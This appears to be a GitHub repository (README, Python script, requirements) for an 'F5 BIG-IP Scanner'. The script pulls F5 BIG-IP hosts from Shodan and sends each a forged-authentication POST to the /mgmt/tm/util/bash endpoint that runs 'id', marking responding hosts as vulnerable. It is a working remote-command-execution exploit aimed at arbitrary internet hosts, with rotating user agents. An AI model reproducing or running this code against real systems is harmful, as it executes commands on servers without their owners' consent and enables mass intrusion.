├── README.md
├── f5bigip_scanner.py
└── requirements.txt
/README.md:
--------------------------------------------------------------------------------
1 | # F5-BIG-IP-Scanner
2 | F5 BIG-IP Scanner scans for servers on shodan and checks to see if they are vulnerable.
3 |
4 | ## INSTALL
5 |
6 | git clone https://github.com/gotr00t0day/F5-BIG-IP-Scanner.git
7 |
8 | cd F5-BIG-IP-Scanner
9 |
10 | pip3 install -r requirements.txt
11 |
12 | python3 f5bigip_scanner.py
13 |
14 |
--------------------------------------------------------------------------------
/f5bigip_scanner.py:
--------------------------------------------------------------------------------
1 | from colorama import Fore
2 | import shodan
3 | import requests
4 | import json
5 | import urllib3
6 | import random
7 |
8 |
9 | SHODAN_API_KEY = ""
10 | api = shodan.Shodan(SHODAN_API_KEY)
11 |
12 | banner = """
13 |
14 | ███████╗ ██╗██╗ ██╗██████╗ ███████╗ ██████╗██╗ ██╗███╗ ██╗
15 | ██╔════╝███║██║ ██║╚════██╗ ██╔════╝██╔════╝██║ ██║████╗ ██║
16 | █████╗ ╚██║██║ ██║ █████╔╝ ███████╗██║ ███████║██╔██╗ ██║
17 | ██╔══╝ ██║╚██╗ ██╔╝ ╚═══██╗ ╚════██║██║ ╚════██║██║╚██╗██║
18 | ██║ ██║ ╚████╔╝ ██████╔╝ ███████║╚██████╗ ██║██║ ╚████║
19 | ╚═╝ ╚═╝ ╚═══╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═╝╚═╝ ╚═══╝
20 | by: c0deninja
21 | """
22 |
23 | print(f"{Fore.CYAN}{banner}")
24 |
25 | useragent_list = [
26 | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
27 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36",
28 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36",
29 | "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36",
30 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36",
31 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36",
32 | "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36",
33 | "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
34 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
35 | ]
36 |
37 |
38 | headers = {
39 | "User-Agent": random.choice(useragent_list),
40 | 'Content-Type': 'application/json',
41 | 'Connection': 'keep-alive, x-F5-Auth-Token',
42 | 'X-F5-Auth-Token': 'abc',
43 | 'Authorization': 'Basic YWRtaW46'
44 | }
45 | data = {'command': "run",'utilCmdArgs':"-c id"}
46 | try:
47 | results = api.search('http.title:"BIG-IP®-+Redirect" +"Server" product:"F5 BIG-IP"')
48 | ips = []
49 | for result in results['matches']:
50 | ips.append(result['ip_str'])
51 | with open("f5bigip.txt", "w") as f:
52 | for ip_address in ips:
53 | f.writelines(f"{ip_address}\n")
54 | with open("f5bigip.txt", "r") as get_ips:
55 | f5bigips_list = [x.strip() for x in get_ips.readlines()]
56 | for f5_list in f5bigips_list:
57 | try:
58 | response = requests.post(url=f"https://{f5_list}/mgmt/tm/util/bash", json=data, headers=headers, verify=False, timeout=5)
59 | if response.status_code == 200 and 'commandResult' in response.text:
60 | print(f"{Fore.GREEN}VULNERABLE: {Fore.CYAN}https://{f5_list}")
61 | else:
62 | print(f"{Fore.RED}NOT VULNERABLE: https://{f5_list}")
63 | except requests.exceptions.SSLError:
64 | pass
65 | except urllib3.exceptions.MaxRetryError:
66 | pass
67 | except requests.exceptions.ConnectTimeout:
68 | pass
69 | except requests.exceptions.ReadTimeout:
70 | pass
71 | except shodan.APIError as e:
72 | print('Error: {}'.format(e))
73 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | colorama
2 | requests
3 | shodan
4 |
--------------------------------------------------------------------------------